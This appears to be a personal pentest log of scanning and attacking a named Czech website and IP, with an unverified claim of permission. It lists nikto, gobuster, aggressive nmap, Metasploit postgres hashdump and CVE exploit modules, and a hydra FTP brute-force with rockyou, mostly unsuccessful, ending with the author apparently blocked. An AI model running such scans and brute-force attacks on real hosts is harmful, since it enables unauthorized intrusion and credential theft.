Web enum of advis-marketing.cz
I've got expressed permission to try hack advis-marketing.cz
With simple nikto commands
IP 91.239.201.14
Server the target is using
OSVDB-877 (Open Source Vulnerability Database
host is vulnerable to XST - Cross-Site Tracing, a vulnerability that exploits the HTTP TRACE method to potentially steal sensitive data, including authentication data and cookies, from a web application.
some info about OSVDB-877
: https://medium.com/@tushar_rs_/cross-site-tracing-attack-xst-5aa519658b7a ???
Can't find anything too specific on osvdb-877
The txt output file no longer mentions the server information
Trying Gobuster now - Directory enumeration mode
It wouldn't let me procced because of 301 status code
Second attempt with this command:
gobuster dir -k -u advis-marketing.cz -t50 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -b 301,403,404 -e -f --timeout 60s -o buster_advis.txt
Nmap
nmap -sC -sV -A -O -vv -p- -T5 91.239.201.14 -oN nmap_scan.txt
Metasploit on postgresqle
Tried few exploits with no success
msf6 auxiliary(scanner/postgres/postgres_hashdump)
msf6 auxiliary(scanner/postgres/postgres_version)
msf6 exploit(linux/http/acronis_cyber_infra_cve_2023_45249)
msf6 exploit(linux/http/acronis_cyber_infra_cve_2023_45249)
msf6 auxiliary(scanner/postgres/postgres_dbname_flag_injection)
msf6 auxiliary(scanner/postgres/postgres_login)
msf6 auxiliary(scanner/postgres/postgres_hashdump)
hydra
hydra -l /usr/share/wordlists/SecLists/Usernames/top-usernames-shortlist.txt -P /usr/share/wordlists/rockyou.txt ftp://91.239.201.14
huh, i cant seem to access advis-marketing.cz from the thm vm but i can access it from my own browser? Everything else seems to be working fine, just advis-marketing.cz not working. How could it be? Did it block my access from my ip lol? I've turn off hydra, nmap scans and everyting but to no avail.
Last updated